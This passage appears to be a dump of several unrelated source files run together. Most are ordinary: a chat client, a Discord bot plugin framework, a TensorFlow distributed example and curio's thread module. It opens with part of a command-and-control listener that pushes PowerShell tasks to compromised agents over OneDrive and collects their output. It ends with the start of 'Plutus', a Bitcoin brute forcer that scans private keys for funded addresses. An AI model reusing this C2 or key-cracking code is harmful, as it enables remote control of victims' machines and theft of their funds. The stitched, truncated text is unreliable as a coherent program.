                    dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))

            # --- Taskings: push queued tasks for each known agent -------------
            agent_ids = self.mainMenu.agents.get_agents_for_listener(listener_name)
            for agent_id in agent_ids: #Upload any tasks for the current agents
                task_data = self.mainMenu.agents.handle_agent_request(agent_id, 'powershell', staging_key, update_lastseen=False)
                if task_data:
                    try:
                        r = s.get("%s/drive/root:/%s/%s/%s.txt:/content" % (base_url, base_folder, taskings_folder, agent_id))
                        if r.status_code == 200: # If there's already something there, download and append the new data
                            task_data = r.content + task_data
                        message = "[*] Uploading agent tasks for {}, {} bytes".format(agent_id, str(len(task_data)))
                        signal = json.dumps({
                            'print': False,
                            'message': message
                        })
                        dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
                        r = s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (base_url, base_folder, taskings_folder, agent_id), data = task_data)
                    except Exception, e:
                        message = "[!] Error uploading agent tasks for {}, {}".format(agent_id, e)
                        signal = json.dumps({
                            'print': False,
                            'message': message
                        })
                        dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))

            # --- Results: collect output files uploaded by agents -------------
            search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, results_folder))
            for item in search.json()['children']: #For each file in the results folder
                try:
                    agent_id = item['name'].split(".")[0]
                    if not agent_id in agent_ids: #If we don't recognize that agent, upload a message to restage
                        print helpers.color("[*] Invalid agent, deleting %s/%s and restaging" % (results_folder, item['name']))
                        s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (base_url, base_folder, taskings_folder, agent_id), data = "RESTAGE")
                        s.delete("%s/drive/items/%s" % (base_url, item['id']))
                        continue
                    try: #Update the agent's last seen time, from the file timestamp
                        seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%S.%fZ")
                    except: #sometimes no ms for some reason...
                        seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%SZ")
                    seen_time = helpers.utc_to_local(seen_time)
                    self.mainMenu.agents.update_agent_lastseen_db(agent_id, seen_time)
                    #If the agent is just checking in, the file will only be 1 byte, so no results to fetch
                    if(item['size'] > 1):
                        message = "[*] Downloading results from {}/{}, {} bytes".format(results_folder, item['name'], item['size'])
                        signal = json.dumps({
                            'print': False,
                            'message': message
                        })
                        dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
                        r = s.get(item['@microsoft.graph.downloadUrl'])
                        self.mainMenu.agents.handle_agent_data(staging_key, r.content, listener_options, update_lastseen=False)
                        message = "[*] Deleting {}/{}".format(results_folder, item['name'])
                        signal = json.dumps({
                            'print': False,
                            'message': message
                        })
                        dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
                        s.delete("%s/drive/items/%s" % (base_url, item['id']))
                except Exception, e:
                    message = "[!] Error handling agent results for {}, {}".format(item['name'], e)
                    signal = json.dumps({
                        'print': False,
                        'message': message
                    })
                    dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))

        except Exception, e:
            # Top-level guard: log and keep polling on any unexpected failure.
            print helpers.color("[!] Something happened in listener %s: %s, continuing" % (listener_name, e))
            message = traceback.format_exc()
            signal = json.dumps({
                'print': False,
                'message': message
            })
            dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))

    # Only reached if the polling loop ever exits (the thread is normally killed).
    s.close()
def start(self, name=''):
    """
    Start a threaded instance of self.start_server() and store it in the
    self.threads dictionary keyed by the listener name.

    name : optional listener name; falls back to this listener's configured
           'Name' option when empty.

    Returns True if the listener thread is still alive after a short grace
    period (i.e. it started successfully), False otherwise.
    """
    listenerOptions = self.options
    # FIX: both branches previously duplicated identical start-up code;
    # resolve the name once and run a single code path.
    if not name:
        name = listenerOptions['Name']['Value']
    self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
    self.threads[name].start()
    time.sleep(3)
    # returns True if the listener successfully started, false otherwise
    return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
main.py | import sys
from threading import Thread
from connection import TcpConnection
from proto.tcp_packet_pb2 import TcpPacket
class Chat():
    """Client-side chat session over a TcpConnection, exchanging protobuf
    TcpPacket messages with the server (lobby creation, join, chat,
    player list, disconnect)."""
    def __init__(self):
        self.connection = TcpConnection()  # blocking TCP transport to the chat server
        self.packet = TcpPacket()  # reusable envelope used to sniff incoming packet types
    def createLobby(self, maxPlayers, *args):
        """Ask the server to create a lobby and return the new lobby's id.
        If a third extra positional argument is given, it is sent as the
        requested lobby id."""
        payload = self.packet.CreateLobbyPacket()
        payload.type = self.packet.CREATE_LOBBY
        payload.max_players = maxPlayers
        if len(args) > 2:
            payload.lobby_id = args[2]
        lobby = self.connection.send(payload)
        payload.ParseFromString(lobby)  # server echoes the created lobby back
        return payload.lobby_id
    def connect(self, id, *args):
        """Join lobby `id` as the player named by args[0] (default 'anon').

        Returns the lobby id on success.  On ERR_LDNE (lobby does not exist)
        or ERR_LFULL (lobby full) the server's error message is printed and
        the process exits with status 1."""
        payload = self.packet.ConnectPacket()
        payload.type = self.packet.CONNECT
        payload.lobby_id = id
        payload.player.name = args[0] if args else 'anon'
        self.user = payload.player  # remember our identity for later packets
        self.lobby = payload.lobby_id
        lobby = self.connection.send(payload)
        self.packet.ParseFromString(lobby)  # peek at the reply's type field
        if self.packet.type == self.packet.CONNECT:
            payload.ParseFromString(lobby)
            return payload.lobby_id
        elif self.packet.type == self.packet.ERR_LDNE:
            payload = self.packet.ErrLdnePacket()
            payload.ParseFromString(lobby)
            print(payload.err_message)
            sys.exit(1)
        elif self.packet.type == self.packet.ERR_LFULL:
            payload = self.packet.ErrLfullPacket()
            payload.ParseFromString(lobby)
            print(payload.err_message)
            sys.exit(1)
    def listen(self, receiveCallback):
        """Start a background thread that pumps incoming frames through
        _parsePacket; display output is sent to receiveCallback(text, color=...)."""
        self.receiveCallback = receiveCallback
        self.stream = Thread(target=self.connection.receive, args=[self._parsePacket])
        self.stream.start()
    def sendChat(self, message):
        """Build (but do not send) a CHAT packet carrying `message` from us."""
        payload = self.packet.ChatPacket()
        payload.type = self.packet.CHAT
        payload.message = message
        payload.player.name = self.user.name
        payload.lobby_id = self.lobby
        return payload
    def getPlayerList(self):
        """Build (but do not send) a PLAYER_LIST request packet."""
        payload = self.packet.PlayerListPacket()
        payload.type = self.packet.PLAYER_LIST
        return payload
    def disconnect(self):
        """Notify the server that we are leaving, then close the connection."""
        payload = self.packet.DisconnectPacket()
        payload.type = self.packet.DISCONNECT
        payload.player.name = self.user.name
        payload.player.id = self.user.id
        self.connection.asyncsend(payload)
        self.connection.close()
    def _parse(type, packet):
        """Decode raw `packet` bytes into a fresh instance of message class `type`.

        NOTE(review): helper has no self/@staticmethod; this only works because
        it is always called unbound as Chat._parse(...) (valid in Python 3) —
        consider adding @staticmethod."""
        data = type()
        data.ParseFromString(packet)
        return data
    def _parsePacket(self, data):
        """Dispatch one raw incoming frame to the receive callback, formatted
        according to its packet type (disconnect/connect/chat/player list)."""
        self.packet.ParseFromString(data)
        if self.packet.type == self.packet.DISCONNECT:
            data = Chat._parse(self.packet.DisconnectPacket, data)
            self.receiveCallback('\n<', color='RED')
            self.receiveCallback(data.player.name)
            self.receiveCallback('> has left the chat room>\n\n', color='RED')
        elif self.packet.type == self.packet.CONNECT:
            data = Chat._parse(self.packet.ConnectPacket, data)
            self.receiveCallback('\n<', color='GREEN')
            self.receiveCallback(data.player.name)
            self.receiveCallback('> has joined the chat>\n\n', color='GREEN')
        elif self.packet.type == self.packet.CHAT:
            data = Chat._parse(self.packet.ChatPacket, data)
            self.receiveCallback(data.player.name + ': ', color='YELLOW')
            self.receiveCallback(data.message + '\n')
        elif self.packet.type == self.packet.PLAYER_LIST:
            data = Chat._parse(self.packet.PlayerListPacket, data)
            self.receiveCallback('\n[PLAYER LIST]\n', color='GREEN')
            for player in data.player_list:
                self.receiveCallback('> {}@{}\n'.format(player.name, player.id))
            self.receiveCallback('\n')
    def _encode(self, stdin):
        """Translate a line of user input into an outgoing packet:
        '^players' requests the player list, anything else becomes chat."""
        if stdin == '^players':
            data = self.getPlayerList()
        else:
            data = self.sendChat(stdin)
        return data
|
plugin.py | """
Plugin is the definition of the plugin interface class as well as extensible utility interfaces
that can be used to create Plugins quickly and easily.
Plugin is designed to be similar to Command and Reaction interface classes while being more versatile.
@author: NGnius
"""
import asyncio, time, traceback
from multiprocessing import Process, Queue
from libs import dataloader, addon
# general plugin constants
PERIOD = 'period'  # config key: seconds between action() runs (-1 disables the loop)
DEFAULT = addon.DEFAULT  # default config section name, shared with the addon module
# threaded constants
THREADED_PERIOD = 'threadedperiod'  # config key: seconds between threaded_action() runs
END_PROCESS = 'endprocess'  # config key: how to stop the worker process on shutdown
# threaded process ending constants (valid values for the END_PROCESS option)
JOIN = 'join'  # wait for the process to finish on its own
TERMINATE = 'terminate'  # forcibly terminate the process
KILL = 'kill' # new in 3.7, do not use
NONE = None  # the plugin's own shutdown() handles process teardown
CUSTOM = None  # alias of NONE: custom teardown in shutdown()
# args constants (keys inside queued action dictionaries)
ARGS = 'args'  # positional-argument list for the API call
KWARGS = 'kwargs'  # keyword-argument dict for the API call
class Plugin(addon.AddOn):
    '''Plugin represents a plugin that the discord bot can work alongside
    to add custom functionality not present in the base bot'''
    def __init__(self, api_methods=dict(), config=None, events=dict(), namespace=None, **kwargs):
        '''(Plugin, dict, str, dict) -> Plugin
        api_methods: a dict of api methods accessible to the Plugin, so that most plugins don't have to be AdminPlugins
        config: path to the plugin's configuration file (required; raises ImportError if missing or None)
        events: dict of awaitable event hooks keyed by the AddOn event constants
        namespace: shared public namespace object for inter-add-on state
        kwargs: included to simplify sub-classing'''
        self.shutting_down = False  # set by _shutdown() to stop the action loop
        if config:
            try:
                self.config = dataloader.datafile(config) # configuration file for the Plugin
                # For 'config'-type files, collapse to the default section's contents.
                if self.config.type=='config':
                    self.config=self.config.content[self.DEFAULT]
            except FileNotFoundError:
                self.config = None # NOTE: This is a bad state for a Plugin to be in, since it may cause unexpected errors
                raise ImportError("No config file found")
        else:
            raise ImportError("Config file cannot be None")
        self.period = float(self.config[PERIOD]) # period for each repetition of action(); -1 disables the loop
        # Bot API callables injected by the loader (keys come from addon.AddOn).
        self.send_message = api_methods[self.SEND_MESSAGE]
        self.edit_message = api_methods[self.EDIT_MESSAGE]
        self.add_reaction = api_methods[self.ADD_REACTION]
        self.remove_reaction = api_methods[self.REMOVE_REACTION]
        self.send_typing = api_methods[self.SEND_TYPING]
        self.send_file = api_methods[self.SEND_FILE]
        self.events = events
        self.public_namespace = namespace
    async def _action(self):
        '''(Plugin) -> None
        Concrete implementations should NOT override this function. Only sub-classes should override this,
        in order to expand or modify it's functionality.
        the looping async method to call action()'''
        while not self.shutting_down and self.period!=-1:
            start_time = time.perf_counter()
            try:
                await self.action()
            except Exception as e: # catch any exception that could crash the task
                # traceback.print_exc()
                self._on_action_error(e)
            # Sleep only the remainder of the period, clamped at zero.
            sleep_time = self.period - (time.perf_counter() - start_time)
            if sleep_time<0:
                sleep_time=0
            await asyncio.sleep(sleep_time) # account for execution time of self.action() in asyncio.sleep()
    async def action(self):
        '''(Plugin) -> None
        the method to be run alongside the discord bot
        This will be looped externally'''
        pass
    def _shutdown(self):
        '''(Plugin) -> None
        Concrete implementations should NOT override this function. Only sub-classes should override this,
        in order to expand or modify it's functionality.
        the method to call shutdown()'''
        self.shutting_down=True
        self.shutdown()
    def shutdown(self):
        '''(Plugin) -> None
        called during bot shutdown/logout
        Use this to save any information that needs to be kept for the next time the bot starts up'''
        pass
    def _on_action_error(self, error):
        '''(Plugin, Exception) -> None
        Concrete implementations should not override this function.
        the method to call on_action_error() '''
        self.on_action_error(error)
    def on_action_error(self, error):
        ''' (Plugin, Exception) -> None
        Called when action() raises an exception
        Use this to handle error reporting or exceptional cases'''
        pass
class ThreadedPlugin(Plugin):
    '''ThreadedPlugin is an extension of the Plugin interface for an independent task to run in another thread.
    This is quite useful for scrapers and other slow tasks that block the main thread and don't require access to bot variables'''

    def spawn_process(self):
        '''(ThreadedPlugin) -> None
        Start the secondary process that runs _threaded_action().'''
        self.process = Process(target=self._threaded_action, args=(self.queue,), kwargs=self.threaded_kwargs)  # secondary process
        self.process.start()

    def __init__(self, should_spawn_thread=True, **kwargs):
        '''(ThreadedPlugin, dict) -> ThreadedPlugin
        should_spawn_thread: when False, the caller is responsible for
        invoking spawn_process() itself (e.g. after extra setup).'''
        super().__init__(**kwargs)
        # method of ending process. Valid options are 'join', 'terminate' and 'kill' (Python3.7+ only for kill)
        self.end_process = self.config[END_PROCESS]
        self.threaded_period = float(self.config[THREADED_PERIOD])  # like self.period, but for threaded_action()
        self.queue = Queue()  # channel for passing information to and from the secondary process
        try:  # ensure threaded_kwargs exists, but don't overwrite a subclass's value
            self.threaded_kwargs
        except AttributeError:
            self.threaded_kwargs = dict()
        # please note that ThreadedPlugin will create a copy of all variables
        # for the new process, unless they're compatible with multiple processes
        if should_spawn_thread:
            self.spawn_process()

    def _shutdown(self):
        '''(ThreadedPlugin) -> None
        Exits the secondary thread and does everything Plugin's _shutdown() does'''
        super()._shutdown()
        if self.process.is_alive():
            if self.end_process == JOIN:
                self.process.join()
            elif self.end_process == TERMINATE:
                self.process.terminate()
            elif self.end_process == KILL:
                self.process.kill()
            elif self.end_process == NONE or self.end_process == CUSTOM:
                pass  # assume user has defined shutdown() and it has already handled ending the thread
        # Wait for the process to terminate, indefinitely if necessary.
        self.process.join()

    def _threaded_action(self, queue, **kwargs):
        '''(ThreadedPlugin, Queue, dict) -> None
        Concrete implementations should NOT override this function. Only sub-classes should override this,
        in order to expand or modify it's functionality.
        Similar to _action(), the looping thread that calls threaded_action'''
        while not self.shutting_down and self.threaded_period != -1:
            start_time = time.perf_counter()
            try:
                self.threaded_action(queue, **kwargs)
            # FIX: was a bare `except:` (which also swallows KeyboardInterrupt
            # and SystemExit); catch Exception to keep the worker alive on errors.
            except Exception:
                traceback.print_exc()
            # Sleep only the remainder of the period, clamped at zero,
            # to account for the execution time of threaded_action().
            sleep_time = self.threaded_period - (time.perf_counter() - start_time)
            if sleep_time < 0:
                sleep_time = 0
            time.sleep(sleep_time)

    def threaded_action(self, queue, **kwargs):
        '''(ThreadedPlugin, Queue, dict) -> None
        the method to be run in the secondary thread
        This will be looped externally'''
        pass

    async def action(self):
        '''(ThreadedPlugin) -> None
        A standard action method to interpret dictionaries in queue
        This method uses the standard plugin constants (SEND_MESSAGE, EDIT_MESSAGE, etc.)
        to interpret dictionaries to use the discord API to do the appropriate actions.
        Use a dictionary, with the appropriate keys, associated to the API action
        to send parameters to the API function (send_message(**kwargs), edit_message(**kwargs), etc.).
        The keys are the same as the API parameters.
        this method overrides Plugin's action method'''
        # FIX: the original repeated six identical try/except branches;
        # a dispatch table keeps behaviour identical with far less duplication.
        dispatch = {
            self.SEND_MESSAGE: self.send_message,
            self.EDIT_MESSAGE: self.edit_message,
            self.ADD_REACTION: self.add_reaction,
            self.REMOVE_REACTION: self.remove_reaction,
            self.SEND_TYPING: self.send_typing,
            self.SEND_FILE: self.send_file,
        }
        while not self.queue.empty():
            action_dict = self.queue.get()  # hopefully it's a dict object
            if not isinstance(action_dict, dict):  # ignore anything that isn't a dict
                continue
            for key in action_dict:
                # Default missing args/kwargs for every entry (matches original).
                if ARGS not in action_dict[key]:
                    action_dict[key][ARGS] = []
                if KWARGS not in action_dict[key]:
                    action_dict[key][KWARGS] = {}
                api_method = dispatch.get(key)
                if api_method is None:
                    continue  # unknown action key; silently ignored, as before
                try:
                    await api_method(*action_dict[key][ARGS], **action_dict[key][KWARGS])
                except TypeError:
                    # TypeError is raised when missing arguments
                    # or when action_dict[key] is not mapping
                    # (ie **action_dict[key] is not a valid operation)
                    pass
class OnReadyPlugin(Plugin):
    '''Plugin variant that defers its action loop until the bot's READY event has fired.'''
    async def _action(self):
        # Wait for the READY event, then run the normal Plugin action loop.
        await self.events[self.READY]()
        await super()._action()
class OnLoginPlugin(Plugin):
    '''Plugin variant that defers its action loop until the bot's LOGIN event has fired.'''
    async def _action(self):
        # Wait for the LOGIN event, then run the normal Plugin action loop.
        await self.events[self.LOGIN]()
        await super()._action()
class OnMessagePlugin(Plugin):
    '''Plugin variant whose action() runs once per incoming message instead of on a fixed timer.'''
    async def _action(self):
        '''(OnMessagePlugin) -> None
        Waits for each MESSAGE event and dispatches it to action().
        Mirrors Plugin._action(): exceptions are routed to on_action_error()
        and the inter-iteration sleep is clamped so it is never negative.'''
        while not self.shutting_down:
            message = await self.events[self.MESSAGE]()  # block until the next message arrives
            start_time = time.perf_counter()
            try:
                await self.action(message)
            except Exception as e:  # FIX: keep the task alive on errors, like Plugin._action()
                self._on_action_error(e)
            # account for execution time of self.action(); clamp negative sleeps
            sleep_time = self.period - (time.perf_counter() - start_time)
            if sleep_time < 0:
                sleep_time = 0
            await asyncio.sleep(sleep_time)

    async def action(self, message):
        '''(OnMessagePlugin, Message) -> None
        Override to handle a single incoming message.
        FIX: declared async — _action() does `await self.action(message)`,
        and awaiting the plain def's None return raised TypeError when a
        subclass did not override this method.'''
        pass
class OnReactionPlugin(Plugin):
    """Plugin that runs its action once per reaction add/remove event.

    Instead of a fixed-period loop, this waits on the REACTION event and
    then throttles so consecutive actions are at least ``self.period``
    seconds apart.
    """

    async def _action(self):
        while not self.shutting_down:
            reaction, user = await self.events[self.REACTION]()  # this is the difference
            start_time = time.perf_counter()
            await self.action(reaction, user)
            # Account for execution time of self.action() in asyncio.sleep();
            # clamp to 0 so a slow action never produces a negative delay.
            elapsed = time.perf_counter() - start_time
            await asyncio.sleep(max(0.0, self.period - elapsed))

    async def action(self, reaction, user):
        # Default no-op; subclasses override. Declared async because
        # _action awaits it — the original sync `def action` returned None,
        # and `await None` raises TypeError when the default is used.
        pass
class AdminPlugin(Plugin):
    """Plugin with direct access to the owning client/bot instance.

    This is a security risk, yay! Use wisely and sparingly.
    """

    def add_client_variable(self, client_var):
        # Expose the bot under both conventional names, then fire the hook.
        self.client = client_var
        self.bot = client_var
        self._on_client_add()

    def _on_client_add(self):
        """() -> None
        wrapper for on_client_add method"""
        self.on_client_add()

    def on_client_add(self):
        """() -> None
        Hook called when the bot client variable is passed to the AdminPlugin.

        Always invoked after the plugin is initialized but before the
        action() task is created. Useful for overriding bot variables or
        methods instead of permanently modifying the bot.py file.
        """
        pass
|
example.py | import tensorflow as tf
from multiprocessing import Process, Queue
from time import sleep
import model
import numpy as np
def generate_noised_data(size=1000):
    """Return (x, y): a clean sine wave and a noisy copy, shaped (size, 1).

    Bug fix: the original used ``np.arange(0, 2*pi, step=size)``, which with
    the default size produced a single sample (length-1 array) that then
    broadcast against a length-``size`` noise vector, yielding mismatched
    x/y shapes. We want ``size`` evenly spaced points over one period.
    """
    t = np.linspace(0.0, 2 * np.pi, num=size)
    # Uniform noise in [0, 0.1).
    noise = np.random.random(size=size) * 0.1
    x = np.sin(t)
    y = x + noise
    # Trailing feature axis so the arrays feed [None, 1] placeholders.
    x = np.expand_dims(x, axis=-1)
    y = np.expand_dims(y, axis=-1)
    return x, y
def update_target_graph(source, target):
    """
    Copies values from one tf.graph() to another
    Useful for setting worker network parameters equal to global network.
    :param source: str()
    :param target: str()
    :return: tf.operation
    """
    from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=source)
    to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=target)
    # Fail loudly if either scope resolved to nothing — a silent empty zip
    # would make the copy a no-op.
    assert from_vars, 'update_target_graph: from_vars is an empty list, source={}'.format(source)
    assert to_vars, 'update_target_graph: to_vars is an empty list, target={}'.format(target)
    # Pair variables positionally and build one assign op per pair.
    return [dst.assign(src) for src, dst in zip(from_vars, to_vars)]
class Actor:
    # Inference-only network: builds an MLP regression graph under its own
    # variable scope. Training is deliberately unimplemented here — see the
    # Learner subclass.
    def __init__(self, scope='actor'):
        self.scope = scope
        self.session = None  # bound lazily to the default session on first use
        with tf.variable_scope(scope):
            # [batch, 1] inputs/targets for the 1-D sine regression task.
            self.data_ph = tf.placeholder(shape=[None, 1], dtype=tf.float32, name='data_ph')
            self.labels_ph = tf.placeholder(shape=[None, 1], dtype=tf.float32, name='labels_ph')
            self.logits = model.build_mlp_graph(self.data_ph, layers=(128, 128))

    def train(self, x, y):
        # Base actor cannot train; Learner overrides this.
        raise NotImplementedError

    def get_trainable_variables(self):
        # All trainable variables created under this instance's scope.
        return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.scope)

    def predict(self, x):
        """Run a forward pass; x feeds data_ph (expects shape [batch, 1])."""
        if self.session is None:
            self.session = tf.get_default_session()
        logits = self.session.run(self.logits,
                                  feed_dict={self.data_ph: x})
        return logits
class Learner(Actor):
    # Actor plus an MSE objective and Adam optimizer; all extra graph nodes
    # live under this instance's own variable scope.
    def __init__(self, scope='learner'):
        super().__init__(scope=scope)
        with tf.variable_scope(scope):
            self.global_step = tf.train.create_global_step()
            self.loss = tf.losses.mean_squared_error(labels=self.labels_ph, predictions=self.logits)
            self.optimizer = tf.train.AdamOptimizer(learning_rate=5.0e-4)
            # params = tf.trainable_variables()
            # build gradients except for old policy nodes
            self.train_op = self.optimizer.minimize(self.loss)  # , global_step=self.global_step)

    def train(self, x, y):
        """Run one gradient step on the batch (x, y); return the batch MSE loss."""
        if self.session is None:
            self.session = tf.get_default_session()
        train_loss, _ = self.session.run([self.loss, self.train_op],
                                         feed_dict={self.data_ph: x, self.labels_ph: y})
        return train_loss
def learner(shared_job_device, queue):
    """Learner (parameter-server) process: builds a Learner on the shared
    device and trains on (x, y) batches pulled from `queue` for max_steps.

    NOTE(review): references the module-level `cluster` created in __main__;
    this relies on the child process re-importing the module — confirm under
    the 'spawn' multiprocessing start method.
    """
    # Note:
    # the learner should be placed on a GPU for performance boost
    with tf.device(shared_job_device):
        learner = Learner()
    server = tf.train.Server(cluster,
                             job_name="learner",
                             task_index=0)
    max_steps = 10000
    with tf.Session(target=server.target) as sess:
        print("Parameter server: initializing variables...")
        print(tf.trainable_variables())
        sess.run(tf.global_variables_initializer())
        global_step = 0
        while global_step < max_steps:
            # Blocks until a worker pushes a batch.
            x, y = queue.get()
            # x, y = data
            loss = learner.train(x, y)
            if global_step % 1000 == 0:
                print('Loss =', loss)
            global_step += 1
            # print('new params:')
            # learner.get_values()
            # train_loss, _ = sess.run([loss, train_op],
            #                          feed_dict={data_ph: x, labels_ph: y})
            # print("Parameter server: var has value %.1f" % val)
            # sleep(1.0)
        print("Learner: request join...")
        server.join()
def actor(worker_n, shared_job_device, queue):
    """Worker process: builds a local Actor plus a handle to the shared
    Learner, repeatedly copies the learner's weights into the local actor,
    runs a test prediction, and pushes generated training data into `queue`.

    NOTE(review): references the module-level `cluster` created in __main__;
    confirm behavior under the 'spawn' multiprocessing start method.
    """
    local_job_device = '/job:worker/task:{}'.format(worker_n)
    with tf.device(local_job_device):
        actor = Actor()
    with tf.device(shared_job_device):
        # Mirror of the learner graph so its variables are addressable here.
        learner = Learner()
    # Ops that assign learner-scope variables onto actor-scope variables.
    update_local_vars = update_target_graph(source='learner', target='actor')
    # start
    server = tf.train.Server(cluster,
                             job_name="worker",
                             task_index=worker_n)
    with tf.Session(target=server.target) as sess:
        # print('worker ({}) fetches values'.format(worker_n))
        print('worker: run global init, session:', sess)
        sess.run(tf.global_variables_initializer())
        # print("Worker %d: waiting for cluster connection..." % worker_n)
        # sess.run(tf.report_uninitialized_variables())
        # print("Worker %d: cluster ready!" % worker_n)
        # print(tf.report_uninitialized_variables())
        # while sess.run(tf.report_uninitialized_variables()):
        #     print("Worker %d: waiting for variable initialization..." % worker_n)
        #     sleep(1.0)
        # print("Worker %d: variables initialized" % worker_n)
        for i in range(5):
            print('worker ({}) fetches values'.format(worker_n))
            # Pull the latest learner weights into the local actor.
            sess.run(update_local_vars)
            data = np.array([[np.pi]])
            print(actor.predict(x=data))
            # produce data
            for _ in range(1000):
                x, y = generate_noised_data()
                data = (x, y)
                queue.put(data)
            # sess.run(var_shared.assign_add(1.0))
            # print("Worker %d: copy shared var" % worker_n)
            sleep(0.2)
        # print('worker ({}): END var_local = {}'.format(worker_n, var_local.eval()))
        print("Worker ({}) requests join".format(worker_n))
        server.join()
if __name__ == '__main__':
    # One learner (parameter server) on port 3000 and three workers on
    # ports 3001-3003, all on localhost.
    workers = ['localhost:{}'.format(3001 + i) for i in range(3)]
    jobname = 'impala'
    cluster = tf.train.ClusterSpec({
        "worker": workers,
        "learner": ["localhost:3000"]
    })
    print(cluster)
    shared_job_device = '/job:learner/task:0'
    # Bounded queue: workers push (x, y) batches, the learner pops them.
    queue = Queue(maxsize=100)
    processes = [Process(target=learner, args=(shared_job_device, queue), daemon=True)]  # add parameter server
    for w in range(len(workers)):  # create worker processes
        processes.append(Process(target=actor, args=(w, shared_job_device, queue), daemon=True))
        sleep(0.1)
    for p in processes:
        p.start()
    # Let the cluster train for a fixed wall-clock budget, then tear down.
    sleep(20)
    for p in processes:
        p.terminate()
thread.py | # curio/thread.py
#
# Not your parent's threading
__all__ = [ 'AWAIT', 'async_thread', 'async_context', 'async_iter', 'AsyncThread', 'is_async_thread' ]
# -- Standard Library
import threading
from concurrent.futures import Future
from functools import wraps
from inspect import iscoroutine
# -- Curio
from . import sync
from .task import spawn, disable_cancellation
from .traps import _future_wait
from . import errors
_locals = threading.local()
class AsyncThread(object):
    """A native OS thread paired with a background curio task.

    The thread runs ``target``; via :meth:`AWAIT` it can hand coroutines to
    the curio kernel for execution and block synchronously on their results.

    Fix: ``kwargs`` used a mutable default (``{}``) shared across every
    instance created without the argument; it now defaults to ``None`` and a
    fresh dict is created per instance (backward compatible for callers).
    """

    def __init__(self, target, args=(), kwargs=None, daemon=False):
        self.target = target
        self.args = args
        self.kwargs = {} if kwargs is None else kwargs
        self.daemon = daemon
        self._request = Future()                      # thread -> kernel coroutine hand-off
        self._done_evt = threading.Event()            # kernel -> thread "result ready"
        self._terminate_evt = sync.UniversalEvent()   # set when thread and runner finish
        self._coro = None
        self._result_value = None
        self._result_exc = None
        self._thread = None
        self._task = None

    async def _coro_runner(self):
        """Kernel-side loop: executes coroutines handed over by the thread."""
        while True:
            # Wait for a hand-off
            await disable_cancellation(_future_wait(self._request))
            self._coro = self._request.result()
            self._request = Future()
            # If no coroutine, we're shutting down
            if not self._coro:
                break
            # Run the coroutine
            try:
                self._result_value = await self._coro
                self._result_exc = None
            except BaseException as e:
                self._result_value = None
                self._result_exc = e
            # Hand it back to the thread
            self._done_evt.set()
        await self._terminate_evt.set()

    def _func_runner(self):
        """Thread entry point: run target(), then signal shutdown."""
        _locals.thread = self
        try:
            self._result_value = self.target(*self.args, **self.kwargs)
            self._result_exc = None
        except BaseException as e:
            self._result_value = None
            self._result_exc = e
        # A None request tells _coro_runner to leave its loop.
        self._request.set_result(None)
        self._terminate_evt.set()

    async def start(self):
        """Spawn the coroutine-runner task and start the backing thread."""
        self._task = await spawn(self._coro_runner, daemon=True)
        self._thread = threading.Thread(target=self._func_runner, daemon=True)
        self._thread.start()

    def AWAIT(self, coro):
        """Called from the thread: run ``coro`` in the kernel and block for
        its result; re-raise any exception it produced."""
        self._request.set_result(coro)
        self._done_evt.wait()
        self._done_evt.clear()
        if self._result_exc:
            raise self._result_exc
        else:
            return self._result_value

    async def join(self):
        """Wait for the thread to finish; wrap its failure in TaskError."""
        await self._terminate_evt.wait()
        if self._result_exc:
            raise errors.TaskError() from self._result_exc
        else:
            return self._result_value

    async def cancel(self):
        # Cancelling the runner task tears down the kernel side.
        await self._task.cancel()
def AWAIT(coro):
    '''
    Await for a coroutine in an asynchronous thread. If coro is
    not a proper coroutine, this function acts a no-op, returning coro.
    '''
    # Non-coroutines pass straight through unchanged.
    if not iscoroutine(coro):
        return coro
    # Only threads launched via AsyncThread have a kernel to hand off to.
    try:
        worker = _locals.thread
    except AttributeError:
        raise errors.AsyncOnlyError('Must be used as async')
    return worker.AWAIT(coro)
def async_thread(func=None, *, daemon=False):
    """Decorator turning a synchronous function into an awaitable that runs
    the function in an AsyncThread. Usable bare or with ``daemon=``."""
    if func is None:
        # Called as @async_thread(daemon=...): return the real decorator.
        def decorator(f):
            return async_thread(f, daemon=daemon)
        return decorator

    @wraps(func)
    async def runner(*args, **kwargs):
        worker = AsyncThread(func, args=args, kwargs=kwargs, daemon=daemon)
        await worker.start()
        try:
            return await worker.join()
        except errors.CancelledError:
            # Propagate cancellation after tearing the thread down.
            await worker.cancel()
            raise
        except errors.TaskError as exc:
            # Unwrap the TaskError added by join() and surface the original.
            raise exc.__cause__ from None
    return runner
def is_async_thread():
    """Return True when the calling thread was launched via AsyncThread
    (i.e. it has a thread-local AsyncThread handle installed)."""
    try:
        _locals.thread
    except AttributeError:
        return False
    return True
|
run_flood.py | # Plutus Bitcoin Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
import os
import multiprocessing
import plutus
import newKeyGen
import hashIterator
def main(database):
    """Endlessly scan private keys derived from a random 32-byte seed,
    walking the seed upward and downward by one on each iteration and
    checking both derived addresses against `database`."""
    print('Working...')
    seed = os.urandom(32)
    upward = bytearray(seed)
    downward = bytearray(seed)
    while True:
        # Forward walk: derive key material and test both address forms.
        key_up = newKeyGen.keygen(upward.hex())
        plutus.process(key_up[0], key_up[2], key_up[3], database)
        plutus.process(key_up[0], key_up[2], key_up[4], database)
